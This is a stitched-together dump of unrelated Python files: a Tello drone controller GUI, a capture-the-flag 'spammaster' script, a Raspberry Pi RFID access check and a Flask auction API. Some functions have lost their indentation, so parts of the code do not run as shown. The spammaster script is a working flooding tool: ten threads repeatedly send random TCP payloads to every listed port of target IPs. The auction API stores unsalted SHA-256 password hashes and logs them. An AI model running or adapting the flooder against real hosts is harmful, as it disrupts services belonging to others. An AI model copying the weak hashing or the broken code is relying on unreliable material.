        self.num = -1  # last digit recognized by tello_num.number_detect

        # control variables
        self.distance = 0.1  # default distance for 'move' cmd (metres)
        self.degree = 30  # default degree for 'cw' or 'ccw' cmd

        # if the pose recognition mode is opened
        self.pose_mode = False
        # if the flag is TRUE,the auto-takeoff thread will stop waiting for the response from tello
        self.quit_waiting_flag = False
        # if the flag is TRUE,the pose recognition skeleton will be drawn on the GUI picture
        self.draw_skeleton_flag = False
        # record the coordinates of the nodes in the pose recognition skeleton
        self.points = []
        # list of all the possible connections between skeleton nodes
        self.POSE_PAIRS = [[0, 1], [1, 2], [2, 3], [3, 4], [1, 5], [5, 6], [6, 7], [1, 14], [14, 8], [8, 9], [9, 10],
                           [14, 11], [11, 12], [12, 13]]

        # initialize the root window and image panel
        self.root = tki.Tk()
        self.panel = None
        # self.panel_for_pose_handle_show = None

        # create buttons
        self.btn_snapshot = tki.Button(self.root, text="Snapshot!",
                                       command=self.takeSnapshot)
        self.btn_snapshot.pack(side="bottom", fill="both",
                               expand="yes", padx=10, pady=5)

        self.btn_pose = tki.Button(self.root, text="QR code Recognition Status: Off",
                                   command=self.setPoseMode)
        self.btn_pose.pack(side="bottom", fill="both",
                           expand="yes", padx=10, pady=5)

        self.btn_pause = tki.Button(self.root, text="Pause", relief="raised", command=self.pauseVideo)
        self.btn_pause.pack(side="bottom", fill="both",
                            expand="yes", padx=10, pady=5)

        self.btn_landing = tki.Button(
            self.root, text="Open Command Panel", relief="raised", command=self.openCmdWindow)
        self.btn_landing.pack(side="bottom", fill="both",
                              expand="yes", padx=10, pady=5)

        # start a thread that constantly pools the video sensor for
        # the most recently read frame
        self.stopEvent = threading.Event()
        self.thread = threading.Thread(target=self.videoLoop, args=())
        self.thread.start()

        # set a callback to handle when the window is closed
        self.root.wm_title("TELLO Controller")
        self.root.wm_protocol("WM_DELETE_WINDOW", self.onClose)

        # the auto-takeoff thread will start if the 'takeoff' button on command window is clicked
        # self.auto_takeoff_thread = threading.Thread(target=self._autoTakeoff)
        # NOTE(review): auto_takeoff_thread is never actually created (the line
        # above is commented out), yet telloTakeOff() still starts it -- confirm.
        # the sending_command will send command to tello every 5 seconds
        self.sending_command_thread = threading.Thread(target=self._sendingCommand)
        self.get_GUI_Image_thread = threading.Thread(target=self._getGUIImage)
def videoLoop(self):
    """
    The mainloop thread of Tkinter

    Reads frames from the drone and, when QR-recognition mode is on,
    drives the search behavior: scan for a QR code, then hunt for the
    matching digit and flip when found.

    Raises:
        RuntimeError: To get around a RunTime error that Tkinter throws due to threading.
    """
    try:
        # start the thread that get GUI image and drwa skeleton
        time.sleep(0.5)
        self.get_GUI_Image_thread.start()
        while not self.stopEvent.is_set():
            # read the frame for pose recognition
            self.frame = self.tello.read()
            # cv2.cvtColor(self.frame, cv2.COLOR_RGB2BGR)
            if self.pose_mode:
                if not self.code_flag:
                    # Phase 1: still searching for a QR code.
                    self.barcodeType, self.barcodeData = tello_QR_code.QR_code_detect(self.frame)
                    if self.barcodeType == 'QRCODE':
                        # Sidestep after a successful read before re-checking.
                        self.telloMoveRight(0.5)
                        time.sleep(2)
                else:
                    # Phase 2: QR code known; look for the printed digit.
                    self.num = tello_num.number_detect(self.frame)
                    print "[INFO]find num:" + str(self.num)
                if self.frame is None or self.frame.size == 0:
                    continue
                if self.barcodeType == 'QRCODE':
                    self.code_flag = 1
                else:
                    print "[INFO]QR code information is invalid!"
                if self.code_flag:
                    if self.barcodeData == str(self.num):
                        # Digit matches the QR payload: celebrate with a flip.
                        self.telloFlip_b()
                        #time.sleep(1)
                        #self.telloLanding()
                    else:
                        if self.num != 0:
                            # Keep scanning sideways for the right digit.
                            self.telloMoveRight(0.45)
                            time.sleep(1)
                        else:
                            # Nothing recognized; back up to widen the view.
                            self.telloMoveBackward(0.1)
                            time.sleep(1)
    except RuntimeError, e:
        print("[INFO] caught a RuntimeError")
def _getGUIImage(self):
    """
    Main operation to read frames from h264decoder and draw skeleton on
    frames if the pose mode is opened
    """
    # read the system of your computer
    system = platform.system()
    while not self.stopEvent.is_set():
        # read the frame for GUI show
        frame = self.tello.read()
        if frame is None or frame.size == 0:
            continue
        if self.pose_mode:
            # Draw the detected skeleton points
            # NOTE(review): self.points is initialized to [] and is never
            # filled in this file; with draw_skeleton_flag True this would
            # raise IndexError -- confirm where points is populated.
            for i in range(15):
                if self.draw_skeleton_flag == True:
                    cv2.circle(frame, self.points[i], 8, (0, 255, 255), thickness=-1, lineType=cv2.FILLED)
                    cv2.putText(frame, "{}".format(i), self.points[i], cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2,
                                lineType=cv2.LINE_AA)
            # Draw Skeleton
            # for pair in self.POSE_PAIRS:
            #     partA = pair[0]
            #     partB = pair[1]
            #     if self.points[partA] and self.points[partB]:
            #         cv2.line(frame, self.points[partA], self.points[partB], (0, 255, 255), 2)
            #         cv2.circle(frame, self.points[partA], 8, (0, 0, 255), thickness=-1, lineType=cv2.FILLED)
        # transfer the format from frame to image
        image = Image.fromarray(frame)
        # we found compatibility problem between Tkinter,PIL and Macos,and it will
        # sometimes result the very long preriod of the "ImageTk.PhotoImage" function,
        # so for Macos,we start a new thread to execute the _updateGUIImage function.
        if system == "Windows" or system == "Linux":
            self._updateGUIImage(image)
        else:
            thread_tmp = threading.Thread(target=self._updateGUIImage, args=(image,))
            thread_tmp.start()
            time.sleep(0.03)
def _updateGUIImage(self, image):
    """Render a PIL image onto the GUI panel, creating the panel on first use."""
    photo = ImageTk.PhotoImage(image)
    if self.panel is None:
        # First frame: build the label widget.  Keeping a reference on the
        # widget (panel.image) stops Tkinter from garbage-collecting the photo.
        self.panel = tki.Label(image=photo)
        self.panel.image = photo
        self.panel.pack(side="left", padx=10, pady=10)
    else:
        # Subsequent frames: just swap the displayed image.
        self.panel.configure(image=photo)
        self.panel.image = photo
# def _autoTakeoff(self):
# """
# Firstly,it will waiting for the response that will be sent by Tello if Tello
#
# finish the takeoff command.If computer doesn't receive the response,it may be
#
# because tello doesn't takeoff normally,or because the UDP pack of response is
#
# lost.So in order to confirm the reason,computer will send 'height?'command to
#
# get several real-time height datas and get a average value.If the height is in
#
# normal range,tello will execute the moveup command.Otherwise,tello will land.
#
# Finally,the sending-command thread will start.
# """
# response = None
# height_tmp = 0 # temp variable to content value of height
# height_val = 0 # average value of height
# cnt = 0 # effective number of height reading
# timeout = 6 # max waiting time of tello's response
#
# timer = threading.Timer(timeout, self._setQuitWaitingFlag)
# timer.start()
#
# # waiting for the response from tello
# while response != 'ok':
# if self.quit_waiting_flag is True:
# break
# response = self.tello.get_response()
# print "ack:%s" % response
# timer.cancel()
#
# # receive the correct response
# if response == 'ok':
# self.tello.move_up(0.5)
#
# # calculate the height of tello
# else:
# for i in range(0, 50):
# height_tmp = self.tello.get_height()
# try:
# height_val = height_val + height_tmp
# cnt = cnt + 1
# print height_tmp, cnt
# except:
# height_val = height_val
#
# height_val = height_val / cnt
#
# # if the height value is in normal range
# if height_val == 9 or height_val == 10 or height_val == 11:
# self.tello.move_up(0.5)
# else:
# self.tello.land()
# # start the sendingCmd thread
# self.sending_command_thread.start()
def _sendingCommand(self):
    """
    start a while loop that sends 'command' to tello every 5 second

    This keeps the drone's SDK mode alive (it exits command mode when it
    receives nothing for a while).  The loop never terminates on its own;
    the thread must be a daemon or be abandoned at shutdown.
    """
    while True:
        self.tello.send_command('command')
        time.sleep(5)
def _setQuitWaitingFlag(self):
    """
    set the variable as TRUE,it will stop computer waiting for response from tello

    Used as a threading.Timer callback to bound how long the auto-takeoff
    logic waits for an acknowledgement.
    """
    self.quit_waiting_flag = True
def openCmdWindow(self):
    """
    open the cmd window and initial all the button and text

    Builds a Toplevel with help text, land/takeoff/flip buttons, the
    keyboard bindings for manual flight, and the two trackbars that set
    the default move distance and rotation degree.
    """
    panel = Toplevel(self.root)
    panel.wm_title("Command Panel")

    # create text input entry
    text0 = tki.Label(panel,
                      text='This Controller map keyboard inputs to Tello control commands\n'
                           'Adjust the trackbar to reset distance and degree parameter',
                      font='Helvetica 10 bold'
                      )
    text0.pack(side='top')

    text1 = tki.Label(panel, text=
                      'W - Move Tello Up\t\t\tArrow Up - Move Tello Forward\n'
                      'S - Move Tello Down\t\t\tArrow Down - Move Tello Backward\n'
                      'A - Rotate Tello Counter-Clockwise\tArrow Left - Move Tello Left\n'
                      'D - Rotate Tello Clockwise\t\tArrow Right - Move Tello Right',
                      justify="left")
    text1.pack(side="top")

    self.btn_landing = tki.Button(
        panel, text="Land", relief="raised", command=self.telloLanding)
    self.btn_landing.pack(side="bottom", fill="both",
                          expand="yes", padx=10, pady=5)

    self.btn_takeoff = tki.Button(
        panel, text="Takeoff", relief="raised", command=self.telloTakeOff)
    self.btn_takeoff.pack(side="bottom", fill="both",
                          expand="yes", padx=10, pady=5)

    # binding arrow keys to drone control; the hidden frame must keep
    # keyboard focus for the bindings to fire.
    self.tmp_f = tki.Frame(panel, width=100, height=2)
    self.tmp_f.bind('<KeyPress-w>', self.on_keypress_w)
    self.tmp_f.bind('<KeyPress-s>', self.on_keypress_s)
    self.tmp_f.bind('<KeyPress-a>', self.on_keypress_a)
    self.tmp_f.bind('<KeyPress-d>', self.on_keypress_d)
    self.tmp_f.bind('<KeyPress-Up>', self.on_keypress_up)
    self.tmp_f.bind('<KeyPress-Down>', self.on_keypress_down)
    self.tmp_f.bind('<KeyPress-Left>', self.on_keypress_left)
    self.tmp_f.bind('<KeyPress-Right>', self.on_keypress_right)
    self.tmp_f.pack(side="bottom")
    self.tmp_f.focus_set()

    # NOTE(review): btn_landing is reused for the Flip button and
    # btn_distance for both Reset buttons, so earlier references are lost.
    self.btn_landing = tki.Button(
        panel, text="Flip", relief="raised", command=self.openFlipWindow)
    self.btn_landing.pack(side="bottom", fill="both",
                          expand="yes", padx=10, pady=5)

    self.distance_bar = Scale(panel, from_=0.02, to=5, tickinterval=0.01, digits=3, label='Distance(m)',
                              resolution=0.01)
    self.distance_bar.set(0.2)
    self.distance_bar.pack(side="left")

    self.btn_distance = tki.Button(panel, text="Reset Distance", relief="raised",
                                   command=self.updateDistancebar,
                                   )
    self.btn_distance.pack(side="left", fill="both",
                           expand="yes", padx=10, pady=5)

    self.degree_bar = Scale(panel, from_=1, to=360, tickinterval=10, label='Degree')
    self.degree_bar.set(30)
    self.degree_bar.pack(side="right")

    self.btn_distance = tki.Button(panel, text="Reset Degree", relief="raised", command=self.updateDegreebar)
    self.btn_distance.pack(side="right", fill="both",
                           expand="yes", padx=10, pady=5)
def openFlipWindow(self):
    """
    open the flip window and initial all the button and text

    One button per flip direction; each simply delegates to the matching
    telloFlip_* wrapper.
    """
    panel = Toplevel(self.root)
    panel.wm_title("Gesture Recognition")

    self.btn_flipl = tki.Button(
        panel, text="Flip Left", relief="raised", command=self.telloFlip_l)
    self.btn_flipl.pack(side="bottom", fill="both",
                        expand="yes", padx=10, pady=5)

    self.btn_flipr = tki.Button(
        panel, text="Flip Right", relief="raised", command=self.telloFlip_r)
    self.btn_flipr.pack(side="bottom", fill="both",
                        expand="yes", padx=10, pady=5)

    self.btn_flipf = tki.Button(
        panel, text="Flip Forward", relief="raised", command=self.telloFlip_f)
    self.btn_flipf.pack(side="bottom", fill="both",
                        expand="yes", padx=10, pady=5)

    self.btn_flipb = tki.Button(
        panel, text="Flip Backward", relief="raised", command=self.telloFlip_b)
    self.btn_flipb.pack(side="bottom", fill="both",
                        expand="yes", padx=10, pady=5)
def takeSnapshot(self):
    """
    save the current frame of the video as a jpg file and put it into outputpath
    """
    # grab the current timestamp and use it to construct the filename
    timestamp = datetime.datetime.now()
    filename = "{}.jpg".format(timestamp.strftime("%Y-%m-%d_%H-%M-%S"))
    filepath = os.path.sep.join((self.outputPath, filename))

    # save the file; OpenCV expects BGR channel order when encoding
    cv2.imwrite(filepath, cv2.cvtColor(self.frame, cv2.COLOR_RGB2BGR))
    print("[INFO] saved {}".format(filename))
def setPoseMode(self):
    """
    Toggle the open/close of pose recognition mode
    """
    # Flip the flag, then reflect the new state on the button label.
    self.pose_mode = not self.pose_mode
    if self.pose_mode:
        self.btn_pose.config(text='QR code Recognition Status: On')
    else:
        self.btn_pose.config(text='QR code Recognition Status: Off')
def pauseVideo(self):
    """
    Toggle the freeze/unfreze of video
    """
    # The button's own relief doubles as the toggle state:
    # 'sunken' means the stream is currently frozen.
    if self.btn_pause.config('relief')[-1] == 'sunken':
        self.btn_pause.config(relief="raised")
        self.tello.video_freeze(False)
    else:
        self.btn_pause.config(relief="sunken")
        self.tello.video_freeze(True)
def telloTakeOff(self):
"""
send the takeoff command to tello,and wait for the first response,
if get the 'error'response,remind the "battery low" warning.Otherwise,
start the auto-takeoff thread
"""
takeoff_response = None
self.tello.takeoff()
time.sleep(0.2)
takeoff_response = self.tello.get_response()
if takeoff_response != 'error':
self.auto_takeoff_thread.start()
else:
print "battery low,please repalce with a new one"
# --- Thin wrappers around the tello control API ---------------------------
# Each method forwards one command to the drone and returns its response.

def telloLanding(self):
    # land immediately
    return self.tello.land()

def telloFlip_l(self):
    # flip left
    return self.tello.flip('l')

def telloFlip_r(self):
    # flip right
    return self.tello.flip('r')

def telloFlip_f(self):
    # flip forward
    return self.tello.flip('f')

def telloFlip_b(self):
    # flip backward
    return self.tello.flip('b')

def telloCW(self, degree):
    # rotate clockwise by `degree` degrees
    return self.tello.rotate_cw(degree)

def telloCCW(self, degree):
    # rotate counter-clockwise by `degree` degrees
    return self.tello.rotate_ccw(degree)

def telloMoveForward(self, distance):
    # move forward by `distance` (metres)
    return self.tello.move_forward(distance)

def telloMoveBackward(self, distance):
    # move backward by `distance` (metres)
    return self.tello.move_backward(distance)

def telloMoveLeft(self, distance):
    # move left by `distance` (metres)
    return self.tello.move_left(distance)

def telloMoveRight(self, distance):
    # move right by `distance` (metres)
    return self.tello.move_right(distance)

def telloUp(self, dist):
    # ascend by `dist` (metres)
    return self.tello.move_up(dist)

def telloDown(self, dist):
    # descend by `dist` (metres)
    return self.tello.move_down(dist)
def updateTrackBar(self):
    # NOTE(review): dead code -- neither self.my_tello_hand nor
    # self.hand_thr_bar is created anywhere in this file, so calling this
    # would raise AttributeError.  Presumably left over from a
    # hand-gesture feature; confirm before removing.
    self.my_tello_hand.setThr(self.hand_thr_bar.get())

def updateDistancebar(self):
    """Read the distance trackbar and store it as the default move distance."""
    self.distance = self.distance_bar.get()
    print 'reset distance to %.1f' % self.distance
def updateDegreebar(self):
self.degree = self.degree_bar.get()
print 'reset distance to %d' % self.degree
def on_keypress_w(self, event):
print "up %d m" % self.distance
self.telloUp(self.distance)
def on_keypress_s(self, event):
print "down %d m" % self.distance
self.telloDown(self.distance)
def on_keypress_a(self, event):
print "ccw %d degree" % self.degree
self.tello.rotate_ccw(self.degree)
def on_keypress_d(self, event):
print "cw %d m" % self.degree
self.tello.rotate_cw(self.degree)
def on_keypress_up(self, event):
print "forward %d m" % self.distance
self.telloMoveForward(self.distance)
def on_keypress_down(self, event):
print "backward %d m" % self.distance
self.telloMoveBackward(self.distance)
def on_keypress_left(self, event):
print "left %d m" % self.distance
self.telloMoveLeft(self.distance)
def on_keypress_right(self, event):
print "right %d m" % self.distance
self.telloMoveRight(self.distance)
def on_keypress_enter(self, event):
if self.frame is not None:
self.registerFace()
self.tmp_f.focus_set()
def onClose(self):
    """
    set the stop event, cleanup the camera, and allow the rest of
    the quit process to continue

    Bound to WM_DELETE_WINDOW in __init__; stops the reader threads via
    stopEvent, drops the tello object, and exits the Tk mainloop.
    """
    print("[INFO] closing...")
    self.stopEvent.set()
    del self.tello
    self.root.quit()
|
ctf_spammaster.py | """
Released under the MIT-license:
Copyright (c) 2009,2010 Earl Marcus
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import sys
import socket
import time
import random
import thread
from threading import Thread
from Queue import Queue
# Minutes between spam rounds (see the commented sleep in workerThread).
time_min = 1
def_IPList = []

# Used for threading: queue of target IPs plus a lock serializing print().
ip_queue = Queue()
printLock = None  # allocated in __main__ before the workers start
# Generate a random packet with a random size.
def GeneratePacket(min_size=30, max_size=256):
    """Build a random binary payload.

    :param min_size: smallest allowed payload length (default 30).
    :param max_size: largest allowed payload length (default 256, the
        value the original hard-coded; its comment claimed 1024).
    :return: (packet, size) -- `size` random characters in chr(0..255).

    Fixes: size bounds are now parameters (defaults preserve behavior);
    range() replaces xrange() so the module also imports on Python 3; the
    O(n^2) string += loop is replaced by a single join.
    """
    size = random.randint(min_size, max_size)
    packet = "".join(chr(random.randint(0, 255)) for _ in range(size))
    return (packet, size)
def SpamThread(ip):
    """Send one random TCP payload to every port in the global `ports` list.

    `ports` is read from ports.txt in __main__.  Connection or send
    failures are reported per-port and do not stop the sweep.
    """
    global ports
    for port in ports:
        packet, size = GeneratePacket()
        # Spam
        printStr("Spamming %s:%s with data size %d" % (ip, port, size))
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, int(port)))
            s.send(packet)
            s.close()
        except:
            # deliberately best-effort: any network error just logs and
            # moves on to the next port
            printStr("Failed on %s port %s" % (ip, port))
def printStr(string):
global printLock
printLock.acquire()
print string
printLock.release()
def workerThread(q):
    """Worker loop: claim one IP from the queue and spam it forever.

    Bug fix: the original called q.task_done() on every loop iteration;
    Queue.task_done() raises ValueError ("called too many times") when it
    exceeds the number of get() calls, which killed each worker on its
    second pass.  The item is now marked done exactly once, right after
    it is claimed, so ip_queue.join() also behaves sanely.
    """
    ip = q.get()
    q.task_done()
    while 1:
        SpamThread(ip)
        #time.sleep(time_min*60)
        time.sleep(30)
if __name__ == "__main__":
    random.seed()
    # Load target IPs, one per whitespace-separated token.
    f = open("ips.txt")
    ips = f.read().split()
    f.close()
    # Load target ports the same way (kept as strings; SpamThread casts).
    f = open("ports.txt")
    ports = f.read().split()
    f.close()
    # Acquire locks
    printLock = thread.allocate_lock()
    # Start kicking off threads.
    # NOTE(review): exactly 10 workers are started and each worker claims
    # a single IP for its whole lifetime, so IPs beyond the tenth are
    # never serviced -- confirm this is intended.
    for i in xrange(10):
        worker = Thread(target=workerThread, args=(ip_queue,))
        worker.setDaemon(True)
        worker.start()
    for ip in ips:
        ip_queue.put(ip)
    ip_queue.join()
|
rfid_auth.py | #!/usr/bin/env python
# -*- coding: utf8 -*-
import RPi.GPIO as GPIO
import MFRC522
import signal
import time
import threading
from multiprocessing import Process
# Capture SIGINT for cleanup when the script is aborted
def end_read(signal, frame):
    """SIGINT handler: stop the read loop and release the GPIO pins."""
    global continue_reading
    print "Ctrl+C captured, ending read."
    continue_reading = False
    GPIO.cleanup()
# Main-loop flag, cleared by the SIGINT handler above.
continue_reading = True

# Physical (BOARD) pin numbering: 11 = pulsing status LED (PWM),
# 13 = green "authorized" LED, 15 = red "denied" LED.
GPIO.setmode(GPIO.BOARD)
GPIO.setup(11, GPIO.OUT)
GPIO.setup(13, GPIO.OUT)
GPIO.setup(15, GPIO.OUT)
# LED Pulsate function
def pulsate():
    """Endlessly fade the status LED on pin 11 up and then down via PWM.

    Runs in a separate process (see startPulsate); it is terminated from
    the main loop when a card is read.
    """
    red = GPIO.PWM(11, 100)  # 100 Hz PWM on pin 11
    red.start(0)
    pause_time = 0.011  # per-step delay; ~1.1 s per full ramp
    try:
        while True:
            print "running"
            # i runs 100 -> 0, so duty (100 - i) ramps 0 -> 100 (brighten)
            for i in range(100, -1, -1):
                red.ChangeDutyCycle(100 - i)
                time.sleep(pause_time)
            # i runs 0 -> 100, so duty ramps 100 -> 0 (dim)
            for i in range(0, 101):
                red.ChangeDutyCycle(100 - i)
                time.sleep(pause_time)
    except Exception as e:
        print str(e)
# Create object for pulsate_led process
def startPulsate():
    """Spawn the LED-pulsating helper as a daemon process and return it."""
    proc = Process(target=pulsate)
    # Daemonize so the LED process dies together with the main script.
    proc.daemon = True
    proc.start()
    return proc
# Call pulsate process into a variable
p = startPulsate()

# Hook the SIGINT
signal.signal(signal.SIGINT, end_read)

# Create an object of the class MFRC522
MIFAREReader = MFRC522.MFRC522()

# This loop keeps checking for chips. If one is near it will get the UID and authenticate
while continue_reading:
    # Scan for cards
    (status, TagType) = MIFAREReader.MFRC522_Request(MIFAREReader.PICC_REQIDL)

    # Get the UID of the card.
    # NOTE(review): the Request status above is overwritten here, so the
    # anticollision result is used regardless of whether a tag actually
    # answered the poll -- confirm this is what the reader library expects.
    (status, uid) = MIFAREReader.MFRC522_Anticoll()

    # If we have the UID, continue
    if status == MIFAREReader.MI_OK:
        # Join UID array into friendly string
        uid_str = ":".join([str(x) for x in uid])
        # Define authorized card (single hard-coded UID)
        authorized_uid = "201:133:20:43:115"
        # Kill pulsating LED process
        p.terminate()
        # Check if UID is Authorized
        if uid_str == authorized_uid:
            # Green Light
            GPIO.output(13, GPIO.HIGH)
        else:
            # Red Light - DENIED
            GPIO.output(15, GPIO.HIGH)
            print("DENIED!")
        # Wait 5 seconds then turn all the lights off
        time.sleep(5)
        GPIO.output(13, GPIO.LOW)
        GPIO.output(15, GPIO.LOW)
        # Restart pulsating process
        p = startPulsate()
|
demo-api.py | ##
## =============================================
## ============== Bases de Dados ===============
## ============== LEI 2020/2021 ===============
## =============================================
## =================== Demo ====================
## =============================================
## =============================================
## === Department of Informatics Engineering ===
## =========== University of Coimbra ===========
## =============================================
##
## Authors:
## Nuno Antunes <nmsa@dei.uc.pt>
## BD 2021 Team - https://dei.uc.pt/lei/
## University of Coimbra
from flask import Flask, jsonify, request
import logging, psycopg2, time
import hashlib
import threading,time
from encrypter import dec_file
# Database connection settings; blank here and presumably filled in at
# startup (the file imports encrypter.dec_file) -- TODO confirm where.
usr=""
pswd=""
hst=""
dbase=""

app = Flask(__name__)
def return_user_id(token, cur):
    """Resolve an auth token to its user id.

    Runs the confirm_token() database function through `cur` and returns
    the resulting user id, or -1 when the token is unknown/expired or the
    query fails.
    """
    statement = """
            SELECT confirm_token(%s)"""
    try:
        cur.execute(statement, (token,))
        row = cur.fetchone()
        user_id = row[0]
    except (Exception, psycopg2.DatabaseError) as error:
        logger.error(error)
        user_id = -1
    # confirm_token() yields NULL for an invalid token; normalize to -1.
    return -1 if user_id is None else user_id
# !not used rn
def formatter_db_update(dic, id ):
    # NOTE(review): dead code -- the generated statement mixes UPDATE with
    # a VALUES clause, which is not valid SQL; keep only as a sketch or
    # delete once confirmed unused.
    return 'update leiloes set ('+(len(dic)-1)*'%s,'+'%s) values ('+'('+(len(dic)-1)*'%s,'+'%s) where leilaoid='+id+';' # dic.keys()+ dic.values())
def warn_winning_bidders():  # meant to run as a background thread
    """Background loop: every 5 minutes purge expired tokens and notify
    auction winners via the clean_tokens()/warn_auct_winners() procedures.

    The connection/cursor are created once and reused; errors roll back
    and the loop keeps going.
    """
    # check which auctions have ended
    conn = db_connection()
    cur = conn.cursor()
    while True:
        try:
            print("checking auctions")
            cur.execute('call clean_tokens();')
            cur.execute('call warn_auct_winners();')
            cur.execute('commit')
            time.sleep(5*60)  # sleeps 5 minutes before each action
        except (Exception, psycopg2.DatabaseError) as error:
            logger.error('In supporting thread...')
            logger.error(error)
            cur.execute('rollback')
# avisar os respetivos utilizadores
#very basic email regex checking: [a-zA-Z0-9\.\_]+@[a-zA-Z0-9\.\_]+\.[a-zA-Z0-9\.\_]+
# user login
@app.route("/dbproj/user/", methods=['POST'])  # user registration
def add_user():
    """POST /dbproj/user/ -- register a new user via register_user().

    Expects JSON with username, password and email; returns a status
    string ('User registered!' or 'Failed!').
    """
    logger.info("### INSERTION OF USERS ###");
    payload = request.get_json()
    if "username" not in payload or "password" not in payload or "email" not in payload :
        return 'username , email and password are required to create a new username!'

    conn = db_connection()
    cur = conn.cursor()

    logger.info("---- new user ----")
    logger.debug(f'payload: {payload}')

    # parameterized queries, good for security and performance
    statement = """
                  SELECT register_user(%s, %s, %s);"""

    # NOTE(review): unsalted SHA-256 is a weak password hash (consider
    # bcrypt/scrypt/argon2), and the hash is written to the log below.
    val_pass = hashlib.sha256(payload["password"].encode()).hexdigest()
    #logger.info(payload["username"])
    logger.info(val_pass)
    values = (payload["username"], val_pass, payload["email"])

    try:
        cur.execute(statement, values)
        cur.execute('commit')
        result = 'User registered!'
    except (Exception, psycopg2.DatabaseError) as error:
        logger.error(error)
        cur.execute('rollback')
        result = 'Failed!'
    finally:
        if conn is not None:
            conn.close()
    return jsonify(result)
# user login
@app.route("/dbproj/message/<leilaoid>", methods=['POST'])  # post a message on an auction wall
def send_message(leilaoid):
    """POST /dbproj/message/<leilaoid> -- post a message to an auction's wall.

    Expects JSON with `message` and `authToken`; the token is resolved to
    a user id before inserting.
    """
    logger.info("### INSERTION OF USERS ###");
    payload = request.get_json()
    if "message" not in payload or "authToken" not in payload:
        return 'message and authToken are required to send message!'

    conn = db_connection()
    cur = conn.cursor()

    userId = return_user_id(payload["authToken"], cur)
    if userId == -1:
        if conn is not None:
            conn.close()
        return 'Invalid token: check it or login again'

    logger.info("---- new message ----")
    logger.debug(f'payload: {payload}')

    # parameterized queries, good for security and performance
    # NOTE(review): max(msg_id)+1 is racy under concurrent inserts; a
    # sequence/serial column would be safer.
    statement = """
            INSERT INTO mensagem values ((select coalesce(max(msg_id),0)+1 from mensagem), %s, now(), %s, %s);
            """
    values = (payload["message"], userId, leilaoid)

    try:
        cur.execute(statement, values)
        cur.execute('commit')
        result = 'Message delivered!'
    except (Exception, psycopg2.DatabaseError) as error:
        logger.error(error)
        cur.execute('rollback')
        result = 'Failed!'
    finally:
        if conn is not None:
            conn.close()
    return jsonify(result)
# user login
@app.route("/dbproj/notif/<all>", methods=['GET'])  # notification box
def open_notif_box(all):
    """GET /dbproj/notif/<all> -- list a user's notifications, newest
    first, then mark them all as read.

    The <all> URL segment selects scope: "1"/"true"/"yes"/"all" returns
    every notification, anything else only the unread ones.

    Bug fix: the original evaluated the raw path string for truthiness,
    so ANY non-empty segment (including "false" or "0") selected the
    all-notifications branch and the unread-only query was unreachable.
    """
    logger.info("### NOTIFICATION CHECK ###");
    payload = request.get_json()
    if "authToken" not in payload:
        return 'authToken is required to check notif box!'

    conn = db_connection()
    cur = conn.cursor()

    userId = return_user_id(payload["authToken"], cur)
    if userId == -1:
        if conn is not None:
            conn.close()
        return 'Invalid token: check it or login again'

    logger.info("---- checking notifs ----")
    logger.debug(f'payload: {payload}')

    # `all` shadows the builtin but must keep its name to match the <all>
    # route variable; interpret it as an explicit boolean flag.
    show_all = str(all).strip().lower() in ("1", "true", "yes", "all")

    # parameterized queries, good for security and performance
    if show_all:
        statement1 = """
            select assunto, conteudo, data from notificacao where id_notif in
                (select notificacao_id_notif from utilizador_notificacao
                where utilizador_userid = %s)
            order by id_notif desc;
            """
    else:
        statement1 = """
            select assunto, conteudo, data from notificacao where id_notif in
                (select notificacao_id_notif from utilizador_notificacao
                where utilizador_userid = %s and lida = false)
            order by id_notif desc;
            """
    statement2 = """
        update utilizador_notificacao set lida = true where
        utilizador_userid =%s
        """
    values = (userId,)
    result = []
    try:
        cur.execute(statement1, values)
        rows = cur.fetchall()
        if rows == []:
            result = 'No new notifications'
        else:
            for row in rows:
                result.append({'assunto': row[0], 'data': row[2], 'conteudo': row[1]})
        # Mark everything as read only after a successful fetch.
        cur.execute(statement2, values)
        cur.execute('commit')
    except (Exception, psycopg2.DatabaseError) as error:
        logger.error(error)
        cur.execute('rollback')
        result = 'Failed!'
    finally:
        if conn is not None:
            conn.close()
    return jsonify(result)
@app.route("/dbproj/user/", methods=['PUT'])
def authenticate_user():
    """Authenticate a user and return a session token.

    Expects JSON with ``userId`` and ``password``; the password is hashed
    with SHA-256 and validated by the ``authenticate`` stored procedure,
    which issues a token valid for 3 hours.
    """
    logger.info("### AUTHENTICATION OF USERS ###")
    content = request.get_json()
    if "userId" not in content or "password" not in content:
        return 'user and password are required to login!'
    conn = db_connection()
    cur = conn.cursor()
    logger.info("---- update user ----")
    # SECURITY FIX: the original logged the whole request body (plaintext
    # password), the password hash and the issued token.  Log only the id.
    logger.info(f'login attempt for userId: {content["userId"]}')
    # parameterized queries, good for security and performance
    statement = """
        SELECT authenticate(%s, %s, interval '03:00:00')
        """
    val_pass = hashlib.sha256(content["password"].encode()).hexdigest()
    values = (content["userId"], val_pass)
    try:
        cur.execute(statement, values)
        res = cur.fetchone()
        # res is None / res[0] failures fall through to the except branch
        result = {"authToken": res[0]}
        cur.execute('commit')
    except (Exception, psycopg2.DatabaseError) as error:
        logger.error(error)
        cur.execute('rollback')
        result = 'Failed!'
    finally:
        if conn is not None:
            conn.close()
    return jsonify(result)
@app.route('/')
def hello():
    """Landing page shown at the site root (static Portuguese welcome HTML)."""
    welcome_html = """
    Benvindo ao gestor de leilões! <br/>
    <br/>
    Efetue o seu login ou registe-se para continuar!<br/>
    <br/>
    AP Team<br/>
    <br/>
    """
    return welcome_html
##
## Demo GET
##
## Obtain all current auctions, in JSON format
##
## To use it, access:
##
